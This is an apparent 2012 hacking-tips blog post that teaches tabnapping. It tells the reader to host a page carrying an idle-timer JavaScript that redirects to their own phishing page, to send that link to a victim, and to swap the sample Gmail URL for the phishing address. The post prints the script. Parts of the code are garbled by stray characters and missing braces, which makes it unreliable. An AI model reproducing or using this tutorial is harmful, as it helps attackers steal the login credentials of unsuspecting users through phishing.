Tuesday 13 November 2012


Make a web page and use the tab napping script in that page say it page A. This script will not affect the layout or content of the page. This script will check for user actions. If the page is idle for some time, this script will redirect this page to a pre-specified page which may be your phishing page. You have to specify this page in the script. Be sure to change this in script.

check script for this line...

timerRedirect = setInterval("location.href='http://www.gmail.com'",10000);

this line will redirect to Gmail after 10 sec. Change this location to the address of your phishing page. This line is used 2 times in the script so change in both lines.

so, page A with tab napping script will redirect to phishing page B.

Now send the link of the page A to your victim. This is a normal page. If the page is idle for some time it will be changed to page B otherwise no effect.

Hacking internet and computer tips and tricks

<script type="text/javascript">

var xScroll, yScroll, timerPoll, timerRedirect, timerClock;

function initRedirect(){

if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz

xScroll = document.body.scrollLeft;

yScroll = document.body.scrollTop;

clearInterval(timerPoll); //stop polling scroll move

clearInterval(timerRedirect); //stop timed redirect

timerPoll = setInterval("pollActivity()",1?); //poll scrolling

timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect


else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead

xScroll = window.pageXOffset;

yScroll = window.pageYOffset;

clearInterval(timerPoll); //stop polling scroll move

clearInterval(timerRedirect); //stop timed redirect

timerPoll = setInterval("pollActivity()",1?); //poll scrolling

timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect


//else do nothing


function pollActivity(){

if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scroll?Left || yScroll!=document.body.scrollT?op)) //IE/NS7/Moz


(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset)))? { //other browsers

initRedirect(); //reset polling scroll position









Note:You have to copy a source code and paste it into two seperate notepadd++ tab
the first one for the tabnapping, so you will put the script here so that it will redirect to the second one which is actually your phishing page...

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